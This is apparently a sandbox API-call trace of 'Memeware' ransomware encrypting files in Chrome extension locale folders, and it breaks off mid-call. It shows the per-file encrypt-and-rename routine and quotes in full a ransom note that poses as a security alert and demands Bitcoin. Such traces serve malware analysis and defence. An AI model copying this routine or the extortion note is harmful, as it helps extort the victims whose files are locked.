[0079.707] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.707] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\.") returned 145 [0079.707] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.707] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.707] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.708] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.708] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.708] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.708] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.708] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\..") returned 146 [0079.708] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.708] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.708] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.708] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.708] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.708] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.708] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.708] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.708] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json") returned 157 [0079.708] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.708] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.708] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.708] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.708] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.708] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json") returned 157 [0079.708] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.708] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json") returned 157 [0079.708] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.708] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json") returned 157 [0079.708] StrStrW 
(lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.709] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.709] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.709] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.709] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.709] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.710] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.710] CloseHandle (hObject=0x168) returned 1 [0079.710] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.protected") returned 167 [0079.710] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json.protected")) returned 1 [0079.710] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.710] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.710] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\RESTORE_FILES.txt") returned 161 [0079.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.711] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.711] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.711] lstrlenA (lpString="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") returned 684 [0079.711] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0079.711] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.711] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.711] CloseHandle (hObject=0x164) returned 1 [0079.712] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.712] lstrcmpiW (lpString1="ca", lpString2="Windows") returned -1 [0079.712] lstrcmpiW (lpString1="ca", lpString2="Program Files") returned -1 [0079.712] lstrcmpiW (lpString1="ca", lpString2="Program Files (x86)") returned -1 [0079.712] lstrcmpiW (lpString1="ca", lpString2="$Recycle.bin") returned 1 [0079.712] lstrcmpiW (lpString1="ca", lpString2="System Volume Information") returned -1 [0079.712] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca") returned 143 [0079.712] lstrcmpW (lpString1="ca", lpString2=".") returned 1 [0079.712] lstrcmpW (lpString1="ca", lpString2="..") returned 1 [0079.712] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\*") returned 145 [0079.712] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.712] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0079.712] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.712] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.712] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.712] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.712] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\.") returned 145 [0079.712] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.712] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.712] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.712] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.712] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.712] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.712] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.712] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\..") returned 146 [0079.712] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.712] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.712] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.712] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.712] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.712] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0079.712] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.712] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.712] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json") returned 157 [0079.712] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.712] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.713] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.713] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.713] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.713] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json") returned 157 [0079.713] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.713] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json") returned 157 [0079.713] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.713] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json") returned 157 [0079.713] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.713] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.714] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.714] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.714] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.714] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.714] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.714] CloseHandle (hObject=0x168) returned 1 [0079.714] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.protected") returned 167 [0079.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json.protected")) returned 1 [0079.715] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.715] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.715] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\RESTORE_FILES.txt") returned 161 [0079.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.715] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.715] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.716] lstrlenA (lpString="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") returned 684 [0079.716] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.716] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.716] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.716] CloseHandle (hObject=0x164) returned 1 [0079.716] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.716] lstrcmpiW (lpString1="cs", lpString2="Windows") returned -1 [0079.716] lstrcmpiW (lpString1="cs", lpString2="Program Files") returned -1 [0079.716] lstrcmpiW (lpString1="cs", lpString2="Program Files (x86)") returned -1 [0079.716] lstrcmpiW (lpString1="cs", lpString2="$Recycle.bin") returned 1 [0079.716] lstrcmpiW (lpString1="cs", lpString2="System Volume Information") returned -1 [0079.716] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs") returned 143 [0079.716] lstrcmpW (lpString1="cs", lpString2=".") returned 1 [0079.716] lstrcmpW (lpString1="cs", lpString2="..") returned 1 [0079.716] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\*") returned 145 [0079.716] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.717] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.717] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.717] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.717] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.717] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.717] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\.") returned 145 [0079.717] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.717] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.717] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.717] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.717] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.717] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.717] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.717] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\..") returned 146 [0079.717] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.717] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.717] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.717] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.717] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.717] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.717] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.717] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.717] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json") returned 157 [0079.717] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.717] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.717] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.718] CryptEncrypt (in: hKey=0x444cf8, 